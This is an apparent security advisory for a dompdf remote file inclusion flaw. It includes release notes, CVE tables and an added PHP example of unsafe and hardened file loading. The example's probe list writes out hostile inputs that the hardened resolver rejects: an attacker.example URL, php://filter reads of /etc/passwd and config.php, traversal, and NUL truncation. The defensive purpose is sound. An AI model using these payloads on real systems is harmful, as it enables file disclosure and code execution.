
PHP remote file inclusion vulnerability in dompdf.php

2014-03-10 21:57:58
OpenJS Foundation
github.com

CVSS2: 7.5 High
  Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
  Access Vector: NETWORK
  Access Complexity: LOW
  Authentication: NONE
  Confidentiality Impact: PARTIAL
  Integrity Impact: PARTIAL
  Availability Impact: PARTIAL

EPSS: 0.005 Low (percentile 74.9%)

This release is superseded by version 0.7.0.

This is a security-focused release that addresses a number of vulnerabilities that can expose your system to exploitation. In tandem with this release we have also posted a document to the wiki with advice for securing dompdf. Please read the new document and take appropriate measures to protect your systems. We urge all users to upgrade to this release if you are using dompdf 0.6.1 or earlier.

Change Summary for 0.6.2

This update addresses the following announced vulnerabilities:

  Vulnerability                                           Reference      Type                    Severity
  Remote Code Execution (complement of CVE-2014-2383)     CVE-2014-5013  Remote Code Execution   Low; Critical (depending on configuration)
  Denial Of Service Vector                                CVE-2014-5012  Information Disclosure  Medium
  Information Disclosure                                  CVE-2014-5011  Information Disclosure  Medium
  Arbitrary file read in dompdf using PHP stream filters  CVE-2014-2383  Information Disclosure  Medium

Change Summary for 0.6.1

Removed pre-processing of PHP code when DOMPDF_ENABLE_PHP is true (this does not affect embedded script). Prior to this release dompdf was vulnerable to an information disclosure vulnerability. Thanks to Portcullis Computer Security Ltd. for reporting the issue. See the security advisory for additional details: Arbitrary file read in dompdf.

This update addresses the following announced vulnerabilities:

  Vulnerability                                           Reference      Type                    Severity
  Arbitrary file read in dompdf using PHP stream filters  CVE-2014-2383  Information Disclosure  Medium
  PHP remote file inclusion vulnerability in dompdf.php   CVE-2010-4879  Remote File Inclusion   Low; Critical (depending on configuration)

Change Summary for 0.6.0

  Fonts: Full Unicode support (with embedded fonts); DejaVu fonts pre-installed; php-font-lib now provides font handling and sub-setting
  CSS: float support, border radius, transparency, @page, @font-face, generated content, fixed-positioning, transformations
  HTML: HTML5 Parser cleans your HTML syntax
  Images: Expanded image handling (including alpha transparency); added support for Data-URI image sources
  Performance improvements

The project is now hosted on GitHub (the Google Code project is being temporarily maintained).

Download Instructions

Click the link labeled "dompdf-0.6.2.zip" to download the packaged release. The two buttons labeled "Source code" are auto-generated by GitHub and do not include all the necessary files.
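The two file-handling entries in the tables above (CVE-2010-4879, remote file inclusion through dompdf.php, and CVE-2014-2383, arbitrary file read through PHP stream filters) share one root cause: a caller-supplied file name reaches a stream-aware PHP function unchecked. With allow_url_fopen enabled a URL is fetched instead of a local file; if the same value reaches include/require with allow_url_include enabled, the fetched content executes as PHP, which is why the advisory rates the inclusion bug "Critical (depending on configuration)"; and a php://filter wrapper reads local files through a stream filter regardless of either setting. The following is an added example, not dompdf's own code and not the fix the project shipped. The function and directory names are hypothetical, and because the page does not say which request parameter dompdf.php used, none is named. It shows the unsafe pattern beside a resolver that rejects wrapper and scheme prefixes and confines the name to a fixed base directory.

```php
<?php
// Added example, not dompdf code. Function and directory names are hypothetical.

/**
 * Unsafe pattern: the request value goes straight to a stream-aware function.
 *   "http://attacker.example/x.html"   -> fetched remotely if allow_url_fopen is on
 *   "php://filter/read=convert.base64-encode/resource=config.php"
 *                                      -> local source read through a stream filter
 * If the same value reached include/require with allow_url_include on, the
 * remote content would be executed as PHP (remote file inclusion).
 */
function load_input_unsafe(string $input_file): string
{
    return file_get_contents($input_file);
}

/**
 * Hardened pattern: treat the value as a relative name under $base_dir and
 * refuse anything else. Returns the canonical path, or null on rejection.
 */
function resolve_input_path(string $input_file, string $base_dir): ?string
{
    // Reject NUL bytes (path truncation) and any scheme or wrapper prefix such as
    // http://, php://, data:, phar://. Relative names never contain ":" before a "/".
    if (strpos($input_file, "\0") !== false || preg_match('#^[a-z][a-z0-9+.\-]*:#i', $input_file)) {
        return null;
    }
    $base = realpath($base_dir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses "..", resolves symlinks, and returns false for missing files.
    $candidate = realpath($base . DIRECTORY_SEPARATOR . $input_file);
    if ($candidate === false) {
        return null;
    }
    // The canonical path must stay strictly inside the base directory.
    if (strpos($candidate, $base . DIRECTORY_SEPARATOR) !== 0 || !is_file($candidate)) {
        return null;
    }
    return $candidate;
}

function load_input_safe(string $input_file, string $base_dir): string
{
    $path = resolve_input_path($input_file, $base_dir);
    if ($path === null) {
        throw new InvalidArgumentException('input file rejected');
    }
    return file_get_contents($path);
}

// Demonstration on constructed inputs against a throwaway base directory.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'dompdf_example_' . uniqid();
mkdir($base);
file_put_contents($base . DIRECTORY_SEPARATOR . 'report.html', '<p>ok</p>');

$probes = [
    'report.html',                                                   // legitimate local file
    'http://attacker.example/payload.html',                          // remote fetch / inclusion
    'php://filter/read=convert.base64-encode/resource=/etc/passwd',  // stream-filter read
    '../../../../etc/passwd',                                        // directory traversal
    "report.html\0.txt",                                             // NUL truncation
];
foreach ($probes as $p) {
    $r = resolve_input_path($p, $base);
    printf("%-66s => %s\n", str_replace("\0", '\0', $p), $r === null ? 'REJECTED' : 'OK');
}

unlink($base . DIRECTORY_SEPARATOR . 'report.html');
rmdir($base);
```

Only the first probe resolves; the other four are rejected before any stream is opened. The scheme check also rejects Windows drive-letter paths such as C:\..., which is intended here since only relative names under the base directory are legitimate. This resolver is a complement to, not a substitute for, keeping DOMPDF_ENABLE_PHP off and allow_url_include disabled as the advisory's wiki document recommends.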

Affected products

  CPE Name        Operator  Version
  dompdf/dompdf   lt        0.6.1
